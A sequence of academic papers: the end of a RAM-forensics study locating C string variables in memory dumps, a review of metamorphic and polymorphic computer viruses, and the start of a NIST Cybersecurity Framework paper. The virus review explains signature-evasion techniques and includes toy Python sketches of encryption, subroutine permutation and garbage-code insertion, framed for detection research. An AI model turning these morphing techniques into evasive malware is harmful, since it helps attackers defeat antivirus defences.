potential values related to the source code of
the presumed program, see Figure 4.
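A minimal sketch of this search step is shown below: it counts the occurrences of a known literal from the program's source code in a raw dump file. The function name and the byte-by-byte scan are our own simplifications; a real carver would handle overlapping matches and encodings more carefully.

/* Sketch: count occurrences of a known source-code literal in a raw RAM dump.
 * The scan is deliberately simple; it can miss overlapping matches when the
 * literal has a repeated prefix. */
#include <stdio.h>
#include <string.h>

long count_occurrences(const char *dump_path, const char *needle)
{
    FILE *fp = fopen(dump_path, "rb");
    if (fp == NULL)
        return -1;

    size_t nlen = strlen(needle);
    if (nlen == 0) {
        fclose(fp);
        return 0;
    }
    long   hits = 0;
    size_t matched = 0;            /* needle bytes matched so far */
    int    c;
    while ((c = fgetc(fp)) != EOF) {
        if ((char)c == needle[matched]) {
            if (++matched == nlen) { hits++; matched = 0; }
        } else {
            matched = ((char)c == needle[0]) ? 1 : 0;
        }
    }
    fclose(fp);
    return hits;
}

Running such a count over each seized dump would yield occurrence counts of the kind reported in Section 5.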

Figure 4. Investigation model: Step 1 represents the process of creating a memory dump. Step 2 represents the process of searching for potential values related to the target program's source code.

4 EXPERIMENTS

Four experiments are designed, each of which explores the potential evidence that would prove actual software usage during various execution states, see Figure 3. A variable can be assigned a literal or non-literal value. Non-literal values are those that are dynamically calculated or modified and assigned during program execution. Thus, experiments 1, 2, and 3 are designed to investigate variables assigned with string literals during different execution states. In contrast, experiment 4 is designed to investigate variables' values that are dynamically allocated and modified. Our experiments explore three different variable scopes: global, local auto, and local static.

Figure 3. Various variable states that are explored during our experiments. #1 represents a literal value within an active frame and a live process. #2 represents a literal value within a currently inactive frame and a live process. #3 represents a literal value within a currently inactive frame and a dead process. #4 represents a dynamically allocated value first within a live process and then within a dead process.

Experimentation Setup: in all four experiments, we used a Linux virtual machine created using VirtualBox. The VM runs openSUSE Linux version 13.1 with 512 MB of RAM. This VM is hosted on Mac OS X 10.11.5. See Figure 5.

Figure 5. Experimentation Setup: the VM is created using Oracle's VirtualBox.

4.1 Experiment #1

The first experiment is designed to explore the use of a literal string in a currently active stack frame and whether it affects the ability to locate this string in a memory dump that is created during a live process, see #1 in Figure 3. It investigates three different variable scopes: global, local auto, and local static, each of which is initialized at declaration time with a string literal. It explores two different states within an active stack frame of an active process:
State 1: The variable is used; reached in one of the executed statements
State 2: The variable is not used yet; not reached in any of the thus far executed statements
A memory dump is seized in each of these states for each of the explored variables. Each of these dumps is searched for the subject variable and its literal string value. The results of our findings are presented in Section 5.

4.2 Experiment #2

The second experiment is designed to explore the use of a literal string in a currently inactive stack frame and whether it affects the ability to locate this string in a memory dump, see #2 in Figure 3. Similar to the first experiment, this one targets live processes with three different variable scopes: global, local auto, and local static, each of which is initialized at declaration time with a string literal. It explores three different variable states within an inactive stack frame of an active process:
State 1: The variable was used; read or assigned in one of the executed statements
State 2: The variable was not used; not read or assigned in any of the thus far executed statements
State 3: The stack frame was never active; the function is never called
A memory dump is seized in each of these states for each of the three explored variable scopes. Then, these dumps are searched for these literal values. Results of our findings are discussed in Section 5.

4.3 Experiment #3

The third experiment is very similar to the second experiment, except that it explores the effects of having an inactive process (just stopped) on the same three scopes and the same three states investigated in the second experiment, see #3 in Figure 3. A memory dump is seized in each one of these states for each of the three explored variable scopes. Then, these dumps are searched for these literal values. Results of our findings are presented in Section 5.
4.4 Experiment #4
The fourth experiment is designed to investigate dynamically allocated string variables and contrast them with variables that are initialized with literal values in the source code. This experiment explores the possibility of locating variables' values that are allocated in the heap memory, see #4 in Figure 3.
In this experiment, variables are dynamically allocated using malloc() and assigned a string value from another string literal using the strcpy() function; then some characters are modified to distinguish the string residing in the dynamically allocated heap space from the original literal string. It explores the potential of locating these string values in four different states:
State 1: malloc(), strcpy(), and one character is modified
State 2: malloc(), strcpy(), one character is modified, then the free() function is called
State 3: malloc(), strcpy(), one character is modified, the free() function is called, and then the process is terminated normally


State 4: malloc(), strcpy(), one character


is modified, and then signal SIGINT
(Control-C) is used to terminate the
program abnormally. No free() is called
explicitly by the user program
States 3 and 4 are designed specifically to
explore the consequences of having a process
that is terminated normally and a process that
is terminated abnormally. A memory dump
is seized in each one of these states. Then,
these memory dumps are searched for these
dynamically allocated and modified string
values. Results of our findings are discussed
in Section 5.
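The heap scenario behind these four states can be summarized by a small C program along the following lines; the literal string and variable names are invented, and the comments mark where each state's dump would be taken.

/* Illustrative program (string and names invented) showing where the dumps of
 * Experiment 4 are taken relative to malloc(), strcpy(), the one-character
 * modification, and free(). */
#include <stdlib.h>
#include <string.h>

static const char *secret_literal = "wire-transfer-credentials";

int main(void)
{
    char *heap_copy = malloc(strlen(secret_literal) + 1);
    if (heap_copy == NULL)
        return 1;

    strcpy(heap_copy, secret_literal);
    heap_copy[0] = 'W';   /* State 1: allocated, copied, one character modified */

    /* a dump taken here should still contain the modified heap string */

    free(heap_copy);      /* State 2: value released                            */

    return 0;             /* State 3: normal termination                        */
    /* State 4 instead omits free() and terminates the process with SIGINT.    */
}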
5 RESULTS

This section thoroughly presents the results


from all four experiments.
Results from the first experiment show that the values of the global and local static variables have two occurrences each, whereas the value of the local auto variable has only one occurrence, in both states (State 1 and State 2), see Table 1. This means that, in an active stack frame, having the referenced variable used or not used does not affect the number of occurrences of the searched value that can be found. It also means that the investigator can find two occurrences of global and local static variables initialized with literal strings, and only one occurrence for local auto variables.
Table 1. Results from the first experiment show that
global and local static variables have two occurrences
whereas the local auto variable has only one occurrence
for its value. States 1 & 2 show that having the
variable used or not-used does not affect the number of
occurrences in all investigated scopes.
Var. Scope     State 1   State 2
Global         2         2
Local (auto)   1         1
Local Static   2         2

Results from the second experiment show that the values of global and local static variables are found twice in the RAM dump (two occurrences). However, the value of the local auto variable is never found in any of the three investigated states. This means that having an inactive stack frame during a live process reduces the chances of locating the values of local auto variables to zero. In contrast, having an active or inactive stack frame does not affect the values of global and local static variables, at least in our investigation setup, which consists of relatively small programs. Table 2 presents our findings for each of the three different variable scopes and each of the three investigated states.
Table 2. Results from the second experiment show that
global and local static variables have two occurrences
whereas the local auto variable has zero occurrence
for its value. States 1, 2, & 3 show that having the
variable used or not-used does not affect the number
of occurrences in all investigated states, even when the
stack frame is never active.
Var. Scope     State 1   State 2   State 3
Global         2         2         2
Local (auto)   0         0         0
Local Static   2         2         2

Results from the third experiment show that the value of the local auto variable is never found in any of the three investigated execution states (zero occurrences). This is in line with the results from the second experiment. However, the number of occurrences of the values of global and local static variables decreases from two to only one for each variable in each state. This means that, if the process is inactive (dead), the investigator has one chance to locate literal values of global and local static variables (one occurrence). Table 3 presents our findings for each of the three different scopes and each of the three investigated states.
Table 3. Results from the third experiment show that global and local static variables have only one occurrence, whereas the local auto variable has zero occurrences for its value in the RAM dump (when the process is inactive). This is true in all three states, which means that having the variable used or not used does not affect the results, but having an active or inactive process does. States 1, 2, & 3 show that having the variable used or not used does not affect the number of occurrences in any investigated state, even when the stack frame was never active.
Var. Scope     State 1   State 2   State 3
Global         1         1         1
Local (auto)   0         0         0
Local Static   1         1         1

Results from the fourth experiment show that the investigator has a chance to locate a dynamically allocated string value that resides in the heap memory as long as its process

is live and the value is not released yet


(free() function is not called) explicitly in the
program. Otherwise, we have a zero chance
of locating any of these string values; at least
in our experimentation setup. Table 4 shows
the number of occurrences for the investigated
string value within four different execution
states.
Table 4. Results from the fourth experiment show that global, local auto, and local static variables have only one occurrence in State 1 (where the process is active and the free() function has not been called), whereas all variable scopes have zero occurrences in the other three states. This means there is a chance to locate dynamically allocated strings only in State 1.
Var. Scope     State 1   State 2   State 3   State 4
Global         1         0         0         0
Local (auto)   1         0         0         0
Local Static   1         0         0         0

6 RELATED WORK

Many researchers find RAM a vital source of information that can be used in support of legal actions against criminals in digital forensic cases [8, 9, 10, 11, 12, 13]. Shosha et al. developed a prototype to detect different malicious programs that are regularly used by criminals; the proposed approach depends on the deduction of evidence extracted from traces related to the suspect program [14]. Chan et al. introduced ForenScope [15], a RAM forensic tool that permits users to investigate a machine using a regular bash shell. It allows users to disable anti-forensic tools and search for potential evidence, and in order to keep the RAM intact it is designed to work in the unused memory space of the target machine. Petroni et al. introduced FATKit [16], a digital forensic tool dedicated to extracting, analyzing, and visualizing digital forensic data; it utilizes the program source code and its data structures during the analysis of memory dumps. Arasteh et al. extract evidence from RAM based on the logic of the process, which is reconstructed from its stack memory segment [17]. Olajide et al. use RAM dumps to extract users' input information from Windows applications [18]. Shashidhar et al. targeted the prefetch folder and its potential value to the investigator; this folder is used to speed up the startup time of a program on a Windows machine [19].
7 FUTURE WORK

For future work, we are planning to investigate other environments: Windows, Mac, and small devices such as phones and tablets. Some languages have their own memory management system and their own virtual machine, while others, like C, depend directly on the operating system for memory management. We plan to investigate the differences in behavior of various programming languages such as C++, Java, C#, and Python. Furthermore, we look forward to investigating similar scenarios for other data types and data structures. Finally, it would be important to investigate various types and their impact on long-running programs such as servers.
8 CONCLUSION

This paper utilizes information from the source code of a program and employs the program's execution data during various execution states to help the investigator establish evidence against a perpetrator. This will allow law enforcement to take legal action against criminals in a court of law. Our experimentation is based on the C programming language. Based on these experiments, we found that utilizing source code information can be valuable to the investigator. It helps establish the evidence that the perpetrator actually used the software to perform the crime or to cover the wrongdoing. Various string literals and non-literals related to the program's execution are successfully located during various scenarios and execution states.
REFERENCES
[1] M. H. Ligh, A. Case, J. Levy, and A. Walters, The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. John Wiley & Sons, 2014.
[2] M. Banahan, D. Brady, and M. Doran, The C Book. No. ANSI-X-3-J-11-DRAFT, Addison-Wesley, New York, 1988.
[3] D. P. Bovet and M. Cesati, Understanding the Linux Kernel. O'Reilly Media, Inc., 2005.
[4] A. Josey, D. Cragun, N. Stoughton, M. Brown, C. Hughes, et al., "The Open Group base specifications issue 6, IEEE Std 1003.1," The IEEE and The Open Group, vol. 20, no. 6, 2004.
[5] E. Youngdale, "Kernel korner: The ELF object file format by dissection," Linux Journal, vol. 1995, no. 13es, p. 15, 1995.
[6] H. Lu, "ELF: From the programmer's perspective," NYNEX Science & Technology Inc, Citeseer, 1995.
[7] W. R. Stevens and S. A. Rago, Advanced Programming in the UNIX Environment. Addison-Wesley, 2013.
[8] M. I. Al-Saleh and Z. A. Al-Sharif, "Utilizing data lifetime of TCP buffers in digital forensics: Empirical study," Digital Investigation, vol. 9, no. 2, pp. 119-124, 2012.
[9] Z. A. Al-Sharif, D. N. Odeh, and M. I. Al-Saleh, "Towards carving PDF files in the main memory," in The International Technology Management Conference (ITMC2015), pp. 24-31, The Society of Digital Information and Wireless Communication, 2015.
[10] V. S. Harichandran, D. Walnycky, I. Baggili, and F. Breitinger, "CuFA: A more formal definition for digital forensic artifacts," Digital Investigation, vol. 18, pp. S125-S137, 2016.
[11] M. Rafique and M. Khan, "Exploring static and live digital forensics: Methods, practices and tools," International Journal of Scientific & Engineering Research, vol. 4, no. 10, pp. 1048-1056, 2013.
[12] F. N. Dezfoli, A. Dehghantanha, R. Mahmoud, N. F. B. M. Sani, and F. Daryabar, "Digital forensic trends and future," International Journal of Cyber-Security and Digital Forensics (IJCSDF), vol. 2, no. 2, pp. 48-76, 2013.
[13] L. Cai, J. Sha, and W. Qian, "Study on forensic analysis of physical memory," in Proc. 2nd International Symposium on Computer, Communication, Control and Automation (3CA 2013), 2013.
[14] A. F. Shosha, L. Tobin, and P. Gladyshev, "Digital forensic reconstruction of a program action," in Security and Privacy Workshops (SPW), 2013 IEEE, pp. 119-122, IEEE, 2013.
[15] E. Chan, W. Wan, A. Chaugule, and R. Campbell, "A framework for volatile memory forensics," in Proceedings of the 16th ACM Conference on Computer and Communications Security, 2009.
[16] N. L. Petroni, A. Walters, T. Fraser, and W. A. Arbaugh, "FATKit: A framework for the extraction and analysis of digital forensic data from volatile system memory," Digital Investigation, vol. 3, no. 4, pp. 197-210, 2006.
[17] A. R. Arasteh and M. Debbabi, "Forensic memory analysis: From stack and code to execution history," Digital Investigation, vol. 4, pp. 114-125, 2007.
[18] F. Olajide, N. Savage, G. Akmayeva, and C. Shoniregun, "Identifying and finding forensic evidence on Windows application," Journal of Internet Technology and Secured Transactions, ISSN 2046-3723, 2012.
[19] N. K. Shashidhar and D. Novak, "Digital forensic analysis on prefetch files," International Journal of Information Security Science, vol. 4, no. 2, pp. 39-49, 2015.


Systems in Danger: A Short Review on Metamorphic Computer Viruses


Seyed Amirhossein Mousavi1, Babak Bashari Rad2, Teh Ying Wah3
1,2 Asia Pacific University of Technology & Innovation, Technology Park Malaysia, Bukit Jalil, 57000 Kuala Lumpur, Malaysia
1,3 University of Malaya, Jalan Universiti, 50603 Kuala Lumpur, Malaysia
[email protected], [email protected], [email protected]

ABSTRACT
In current times, anti-virus scanners are usually
built on signatures which look for known
patterns in order to decide if a file is virus
infected. Hackers have incorporated the code
obfuscation methods to generate highly
metamorphic system malware in order to evade
detection by signature-based scanners. Such scanners may not be able to detect all instances of these viruses, since metamorphic malware changes its appearance from one generation to another.
Metamorphic malware is one of the many
techniques that hackers use to attack systems.
This paper explores the common types of
computer malwares and metamorphic computer
viruses while reviewing the different techniques
of metamorphic malwares which are able to
avoid detection.
KEYWORDS
Malware, Computer Virus, Metamorphic Virus,
Polymorphic Virus, Obfuscation.

1 INTRODUCTION

As information technology grows and improves, the need for endpoint protection becomes more imperative. An endpoint can be a laptop, desktop, server, or a mobile device that connects to a network (the internet). According to Internet Live Stats, the number of Internet users increased remarkably, roughly tenfold, from 1999 to 2013, and today more than 40 % of the world population has access to an internet connection [1]. This impressive growth in recent years shows that endpoint devices need to be protected from the enormous number of malwares which attempt to infiltrate such systems via the network and internet-connected devices.
In this paper, the characteristics of metamorphic malware will first be explored. In order to achieve this goal, we initially outline different types of malware that have been developed to defeat signature-based antivirus scanners; we then discuss the common types of computer viruses and the complexity of metamorphic malware along with its characteristics.
The paper is organized as follows: the next section describes the common types of malware. Section 3 explores polymorphic and metamorphic computer viruses and the complexity of metamorphic malware. Section 4 reviews previous related work. Finally, the conclusion is given in the final section.

2 COMMON TYPES OF MALWARE

The following sections discuss the common types


of malware which can be broadly classified into
different categories.
2.1 Adware
Adware, or advertising-supported software, is a type of computer malware that can spontaneously deliver advertisements. An


adware will display or download advertisements on a computer after malicious software is installed or an application is used [2].
This software is programmed to determine which internet sites are most visited by the user and then displays advertisements relevant to the user's interests. The most common adware programs are free online games, peer-to-peer software such as torrent clients, etc.

2.2 Spyware

These types of malware spy on or monitor users and gather information about the web sites frequently visited by the users, which may include credit card or online banking details, email addresses, etc. This software helps hackers to collect information about a victim's system without the consent of the victim. A good example of this malware is a keylogger, which is used to monitor the activities of a victim's system [3].

2.3 Worms

A worm is a program which copies itself repeatedly and can eliminate the data and files on the victim computer. This program is designed to steal data, delete files or create botnets. According to Cisco, computer worms are similar to viruses and can cause the same type of damage [4]. The major difference is that worms have the ability to work as standalone software and spread independently, while viruses need human help to propagate [2]. One technique of distributing a worm is to send a large number of emails with infected attachments to a user's contact list.

2.4 Trojan Horse

A Trojan Horse is a malicious program that pretends to be harmless software. However, according to Cisco, Trojan viruses are not able to re-create themselves by infecting other files, nor do they self-replicate. In order to spread, this type of malware requires the end user to interact with the virus through mediums such as downloading and executing a file from the internet or just opening an email attachment [4]. Trojan Horses fall into different classifications depending on how the systems are breached and the amount of damage caused. Some major types of Trojan Horses include remote access Trojans, proxy Trojans, FTP Trojans, destructive Trojans, etc. [5].

2.5 Botnet
Botnet, also known as a zombie army, is a type of malware that an attacker can use to control infected computers or other remote devices. The word botnet is a combination of the words bot and net. In this context, "bot" is derived from the word "robot", which usually refers to a computer or device that is infected by malicious software. "Net", on the other hand, comes from the word "network", a group of interconnected computers. Attackers developing a malicious application might not be able to log onto each individual computer they have infected, so attackers utilize botnets in order to control a massive quantity of infected computers automatically [6].
2.6 Ransomware
This is a type of malicious software that blocks or limits the user from accessing the computer or the files contained on it. These destructors work by locking either the system's screen or the user's files, and the scammer demands a ransom in exchange for unlocking them. It is also considered scareware, as it forces the user to pay a fee by scaring or intimidating them [7].
2.7 Rootkit
A rootkit is another type of computer malware that is intended to remotely access a system without detection by any user or security program [2].
Rootkit attacks can be very difficult to prevent, and rootkits are among the hardest of all malware to detect because of their stealthy operation and continual attempts to hide their presence. Therefore, the detection process relies on other methods, such as manual detection by monitoring computer behavior for irregular activity, signature scanning, etc. [8].
2.8 Virus
A virus is another variant of malicious software: a small program with harmful intent which copies itself and spreads to other systems. This malicious software most often spreads through the sharing of software or files between different computers [4].
The two common types of viruses are polymorphic and metamorphic viruses, which will be discussed in the next section.
3 POLYMORPHIC AND METAMORPHIC COMPUTER VIRUSES

As discussed in the previous section, a virus is a type of malicious software that is small in size, has harmful intent, and easily copies itself and spreads to other systems. This section relates to the field of computer viruses and discusses two common types: polymorphic and metamorphic viruses.
3.1 Polymorphic
It is one of the most complicated types of
system malwares that can affect data types and
functions. It is a self-encrypted virus which is
categorized by the following behavior:
encryption, self-multiplication and ability to
change one or more components of itself to
remain elusive. It is designed to avoid detection
by a scanner and is capable of creating
modified copies of itself [9].
Therefore, a polymorphic virus has the tendency to change itself in more than one way before propagating onto the same computer or onto interconnected network computers. Since this malicious software constantly changes its components and they are encrypted, it is very difficult for anti-virus applications to detect it; polymorphic viruses can be said to be among the most intelligent viruses, as they are hard to identify.
Polymorphic viruses are able to create an infinite number of new decryptors which use different types of encryption methods in order to encrypt the constant part of the virus body. The following figure represents the generation of a polymorphic virus.
Figure 1. Generation of a polymorphic computer virus [15]: the same decrypted virus body appears in different encrypted forms across generations G1, G2, ..., Gn.
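To make the encrypted-body idea concrete, here is a minimal, hedged sketch (a toy XOR model; the payload string and single-byte key are illustrative assumptions, not the mechanism of any specific sample): each generation carries the same body under a fresh key, so the stored bytes usually differ while the decrypted body stays constant.

import os

VIRUS_BODY = b"constant malicious payload"  # toy stand-in for the constant virus body

def new_generation(body=VIRUS_BODY):
    """Produce one 'generation': the same body encrypted under a fresh random key."""
    key = os.urandom(1)[0]
    encrypted = bytes(b ^ key for b in body)
    return key, encrypted

def decrypt(key, encrypted):
    return bytes(b ^ key for b in encrypted)

g1 = new_generation()
g2 = new_generation()
print(g1[1] != g2[1])                              # encrypted appearances usually differ
print(decrypt(*g1) == decrypt(*g2) == VIRUS_BODY)  # decrypted body is identical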

3.2 Metamorphic
According to Kaspersky, a metamorphic malware is one that can transform itself based on the ability to edit, translate and rewrite its own code. Metamorphic malware is considered the
most infectious malicious software and can
cause serious damage to a system if it is not
detected quickly [10].
It is very difficult for antivirus programs to
detect metamorphic malware as it has the
ability to change the internal structure of the
code; reprogram and rewrite after each
infection of a computer system [14]. To protect computers in networks against infection by metamorphic malware, administrators should use a multi-layered approach to blended management, including a well-defined set of security policies, restrictions for remote access control, and usage of an antivirus that is frequently updated.
Metamorphism can change the appearance of the virus while maintaining its functionality. A metamorphic virus does not require decryption or encryption techniques; it presents a new body of the virus on each infection. The metamorphic engine can either be embedded in the virus itself or kept isolated [14]. Figure 2 illustrates the generations of a metamorphic virus whose shape changes but whose functionality stays the same.

Figure 2. Generation of a metamorphic computer virus [15].

3.3 Obfuscation Techniques

Virus writers generally use different techniques to develop a highly morphed metamorphic virus. The following sections describe the common techniques used to program a metamorphic virus.

3.3.1 Register Swap Technique

This is the simplest metamorphic technique. The malware changes its body by using different registers, while the opcodes remain similar across generations. A good example of this technique is the W95/RegSwap virus. Although the transformed version of the virus is not the same as the previous one, the variability is still low and the virus can easily be detected with simple techniques such as half-byte wildcards in signature string scanning [11]. This technique is also called register exchange or register renaming.

Figure 3. Two different generations of RegSwap [11].

3.3.2 Subroutine Permutation Technique


In this technique, the appearance of a virus is changed by reordering its subroutines. For example, when a virus has n unique subroutines, it can generate n factorial different generations without repetition. A good example of a virus that incorporates this technique is W32/Ghost. This malicious application contains 10 subroutines, from which it is able to generate 10 factorial, or 3,628,800, distinct replicated items. Nonetheless, the virus may still be detected with the usage of search strings [12], as the content of every subroutine stays the same.

Figure 4. Subroutine permutation technique [12].
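A minimal sketch of the permutation idea (the subroutine names and bodies are hypothetical): enumerating the n! orderings shows why the layout count explodes, while a per-subroutine search string still matches every layout, which is the detection point noted above.

from itertools import permutations

# Toy virus made of named subroutines; W32/Ghost reportedly permutes 10 of them.
SUBROUTINES = {"sub1": "decrypt()", "sub2": "infect()", "sub3": "payload()"}

def variants(subs):
    """Yield every ordering of the subroutines: n! distinct file layouts."""
    for order in permutations(subs):
        yield [subs[name] for name in order]

all_variants = list(variants(SUBROUTINES))
print(len(all_variants))  # 3! = 6 layouts; with 10 subroutines it would be 3,628,800

# Detection idea from the text: a search string per subroutine still matches,
# because each subroutine's content is unchanged regardless of its position.
needle = "infect()"
print(all(needle in "".join(v) for v in all_variants))  # True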

3.3.3 Garbage Instruction Insertion Technique

Some metamorphic viruses utilize the insertion and removal of garbage instruction codes to produce morphed copies. This technique is also known as "do-nothing" code, which does not alter the function of an application when executed but increases the size of the code [13].
Viruses containing garbage instructions are difficult to detect via signatures, because this technique breaks the signature of the virus. These instructions must be added within a threshold value, since intrusion detection systems are able to identify the anomaly in the code if the quantity of garbage instructions grows too large. The following table shows an example of garbage instruction codes.

Figure 5. Example of Garbage Codes [13]
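A hedged sketch of the insertion step (the instruction strings, garbage pool and threshold are illustrative; real engines operate on machine code): do-nothing instructions are scattered between the original ones up to a threshold ratio, changing the byte layout without changing behavior.

import random

GARBAGE = ["nop", "mov eax, eax", "add ebx, 0", "xchg ecx, ecx"]  # do-nothing examples

def insert_garbage(code, threshold=0.3, seed=None):
    """Scatter do-nothing instructions between real ones, up to a threshold ratio."""
    rng = random.Random(seed)
    morphed = []
    for instr in code:
        morphed.append(instr)
        if rng.random() < threshold:
            morphed.append(rng.choice(GARBAGE))
    return morphed

original = ["mov eax, 5", "xor ebx, ebx", "add eax, ebx", "ret"]
print(insert_garbage(original, seed=1))
print(insert_garbage(original, seed=2))  # different layout, same behavior when executed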


4 RELATED WORKS
Research on metamorphic malware dynamic analysis by Nair et al. [16] proposed a technique for identifying unnoticed malware samples via STraceNTx, which executes files in an emulated framework. The results of the tests concluded that the variants produced by NGVCK showed a lower level of inter- and intra-constructor proximity. Another study on opcode graph similarity and metamorphic detection by Runwal et al. [17] in 2012 discussed the development of a graph-based malware detection tool. The deconstructed malware files were used to generate an opcode graph. The conclusion drawn was that the HMM-based scanner was not competitive with the graph-based technique.
The work on structural entropy and metamorphic malware by Baysa et al. [18] describes a statistical malware detector based on structural entropy and the wavelet transform. For the G2 viruses and MWORM, a detection rate of 100% was achieved. Nonetheless, a false positive rate was observed for the NGVCK viruses of larger capacity. The research by Vinod et al. in 2012 applied the bioinformatics Multiple Sequence Alignment (MSA) technique to detect metamorphic malware [19]. This detector was able to achieve a detection rate of 73.2% and ranked as the third most accurate in comparison with commercial malware scanners.
The paper by Raphel and Vinod in 2015 proposed a non-signature-based system that creates a meta-feature space in order to detect metamorphic malware [20]. It discussed how metamorphic malware was detected by collecting metamorphic malware samples and extracting three kinds of features from the files: branch opcodes, unigrams and bigrams. Toderici and Stamp constructed a hybrid malware detector by combining HMM and


Chi-Square methods. The hybrid tool demonstrated improved accuracy when compared with malware detectors built on HMM or CSD alone [21].
Sridhara and Stamp in 2013 proposed the development of a metamorphic worm. The results from the experiments demonstrated that MWORM, padded with non-threatening subroutines, was able to evade detection via signatures [22]. To find dead code in malware specimens, code emulation was used in another study by Priyadarshi in 2011 [23]. This emulator was applied to metamorphic worms while maintaining the HMM approach. Linear Discriminant Analysis (LDA) was used for metamorphic malware detection in another study by Kuriakose and Vinod in 2014. When using LDA-ranked features for classification, a detection level of 99.7% was achieved [24].
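As a rough sketch of the opcode-graph idea mentioned above (a generic illustration, not the scoring used in [17]; the opcode sequences are hypothetical): each sample is reduced to opcode transition frequencies, and two samples are compared by the difference of their transition weights.

from collections import Counter

def transition_matrix(opcodes):
    """Relative frequency of each opcode-to-opcode transition (a weighted digraph)."""
    pairs = Counter(zip(opcodes, opcodes[1:]))
    total = sum(pairs.values()) or 1
    return {edge: count / total for edge, count in pairs.items()}

def similarity(m1, m2):
    """Crude score in [0, 1]: 1 minus half the summed absolute weight differences."""
    edges = set(m1) | set(m2)
    return 1 - sum(abs(m1.get(e, 0) - m2.get(e, 0)) for e in edges) / 2

sample_a = ["mov", "push", "call", "mov", "push", "call", "ret"]
sample_b = ["mov", "push", "call", "mov", "add", "call", "ret"]
print(similarity(transition_matrix(sample_a), transition_matrix(sample_b)))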

5 CONCLUSION

The evolution of malware has become a great challenge of this decade. Malwares are getting more intelligent and spreading faster among the worldwide computer networks. It will be an interesting time for antivirus researchers to explore new methods for the detection of these destructors. The metamorphic malware family is the most challenging threat today, as it is quite advanced and has reduced the significance of signature-based detection.
For an attacker, writing a metamorphic malware is considered to be more difficult than writing a polymorphic one, because it needs to be programmed to use multiple transformation techniques such as register renaming, code shrinking, code permutation and garbage code insertion. Consequently, for the detection of this malware, different techniques such as generic decryption techniques, negative heuristic analysis, etc. are required to be applied.
In this research, we briefly surveyed the common malware types such as adware, spyware, worms, Trojan horse, botnet, ransomware, rootkit and viruses, which can also be classified into further categories. We also surveyed different techniques of metamorphic malware, such as register swap, subroutine permutation and garbage instruction insertion, which have been created mainly to help metamorphic malware evade antivirus scanners. The future trend is to research artificial intelligence techniques to provide a more efficient way to increase the accuracy of detection of metamorphic malwares.

REFERENCES

[1] Internet Live Stats. 2016. Internet Users in the World [Online]. Available: http://internetlivestats.com/internet-users/ [Accessed 31st July 2016].
[2] Nate Lord. 2012. Common Malware Types: Cybersecurity 101 [Online]. Available: https://www.veracode.com/blog/2012/10/common-malware-types-cybersecurity-101 [Accessed 1st August 2016].
[3] Vinod P., V. Laxmi, and M. S. Gaur. 2009. "Survey on Malware Detection Methods," in Proceedings of the 3rd Hackers' Workshop on Computer and Internet Security (IITKHACK09).
[4] Cisco. What Is the Difference: Viruses, Worms, Trojans, and Bots? [Online]. Available: http://www.cisco.com/c/en/us/about/security-center/virus-differences.html#2 [Accessed 25th July 2016].
[5] Webopedia. Trojan horse [Online]. Available: http://www.webopedia.com/TERM/T/Trojan_horse.html [Accessed 26th July 2016].
[6] Stephen Cobb. 2014. Botnet malware: What it is and how to fight it [Online]. Available: http://www.welivesecurity.com/2014/10/22/botnet-malware-fight/ [Accessed 30th July 2016].
[7] Scamwatch. 2016. Malware & ransomware [Online]. Available: https://www.scamwatch.gov.au/types-of-scams/threats-extortion/malware-ransomware [Accessed 5th August 2016].

[8] Malwaretruth. 2016. List of Common Malware Types [Online]. Available: http://www.malwaretruth.com/the-list-of-malware-types/ [Accessed 4th August 2016].
[9] Arun Kumar. 2016. What is a Polymorphic Virus and how do you deal with it [Online]. Available: http://www.thewindowsclub.com/polymorphic-virus [Accessed 5th August 2016].
[10] Kaspersky. 2016. What is Metamorphic Virus? [Online]. Available: https://usa.kaspersky.com/internet-security-center/definitions/metamorphic-virus#.V6nfErh94_5 [Accessed 7th August 2016].


[11] Gayathri Shanmugam. 2012. Simple Substitution Distance and Metamorphic Detection [Online]. Available: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.344.865&rep=rep1&type=pdf [Accessed 2nd August 2016].
[12] J. Borello and L. Me, "Code Obfuscation Techniques for Metamorphic Viruses," Journal in Computer Virology, Feb 2008.
[13] E. Daoud and I. Jebril, "Computer Virus Strategies and Detection Methods," Int. J. Open Problems Compt. Math., vol. 1, no. 2, September 2008.
[14] Babak Bashari Rad, Maslin Masrom, and Suhaimi Ibrahim, "Camouflage in Malware: from Encryption to Metamorphism," IJCSNS International Journal of Computer Science and Network Security, vol. 12, no. 8, August 2012.
[15] Peter Ferrie. 2003. Hunting For Metamorphic [Online]. Available: https://www.symantec.com/avcenter/reference/hunting.for.metamorphic.pdf [Accessed 7th August 2016].
[16] Nair, V. P., Jain, H., Golecha, Y. K., Gaur, M. S., & Laxmi, V., "MEDUSA: MEtamorphic malware dynamic analysis using signature from API," Proceedings of the 3rd International Conference on Security of Information and Networks, pp. 263-269, 2010.
[17] Runwal, N., Low, R. M., & Stamp, M., "Opcode graph similarity and metamorphic detection," Journal in Computer Virology, 8(1-2), 37-52, 2012.
[18] Baysa, D., Low, R. M., & Stamp, M., "Structural entropy and metamorphic malware," Journal of Computer Virology and Hacking Techniques, 9(4), 179-192, 2013.
[19] Vinod, P., Laxmi, V., Gaur, M., & Chauhan, G., "MOMENTUM: Metamorphic malware exploration techniques using MSA signatures," Innovations in Information Technology (IIT), International Conference on, pp. 232-237, 2012.
[20] Raphel, J., & Vinod, P., "Pruned feature space for metamorphic malware detection using markov blanket," Contemporary Computing (IC3), 2015 Eighth International Conference on, pp. 377-382, 2015.
[21] Toderici, A. H., & Stamp, M., "Chi-squared distance and metamorphic virus detection," Journal of Computer Virology and Hacking Techniques, 9(1), 1-14, 2014.
[22] Sridhara, S. M., & Stamp, M., "Metamorphic worm that carries its own morphing engine," Journal of Computer Virology and Hacking Techniques, 9(2), 49-58, 2013.
[23] Priyadarshi, S. 2013. Metamorphic detection via emulation [Online]. Available: http://www.cs.sjsu.edu/faculty/stamp/students/priyadarshi_sushant.pdf [Accessed 22nd August 2016].
[24] Kuriakose, J., & Vinod, P., "Ranked linear discriminant analysis features for metamorphic malware detection," Advance Computing Conference (IACC), IEEE International, pp. 112-117, 2014.


Application and Evaluation of Method for Establishing Consensus on Measures


Based on Cybersecurity Framework
Shota Fukushima and Ryoichi Sasaki
Tokyo Denki University
Senjuasahicho 5, Adachi-ku, Tokyo, 120-8551 Japan
[email protected] and [email protected]

ABSTRACT
Due to the development of our information society
in recent years, the number of companies depending
on IT systems has increased. However, it has been
noticed that executives have not implemented
sufficient information security measures. This is due
to the poor consensus regarding information
security between executives and IT administrators
in an enterprise. Numerous approaches to solve this
problem have been carried out. The Cybersecurity
Framework developed by NIST is one approach.
